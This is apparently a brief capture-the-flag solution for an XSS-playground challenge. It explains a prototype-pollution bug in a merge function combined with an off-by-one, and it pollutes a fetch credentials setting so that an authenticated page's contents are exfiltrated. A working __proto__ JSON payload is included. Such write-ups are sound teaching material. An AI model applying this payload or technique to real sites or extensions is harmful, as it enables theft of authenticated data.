Charlotte's Web Solution
- Prototype pollution in
utils.merge() and an off-by-one error lets us pollute utils.FONTS[10] through page-settings.
- In the actual CTF challenge, the secret page is authenticated. Pollute
credentials: include through page-style to include the necessary cookies.
Visit this page with the extension installed to view the exfiltrated contents.
Full Solution
| Home
Exfiltrated Contents
{
"fontSize": "100%",
"font": "https://xss-playground-challenges.vercel.app/charlotte/",
"__proto__": {
"10": "https://xss-playground-challenges.vercel.app/charlotte/"
}
}
{}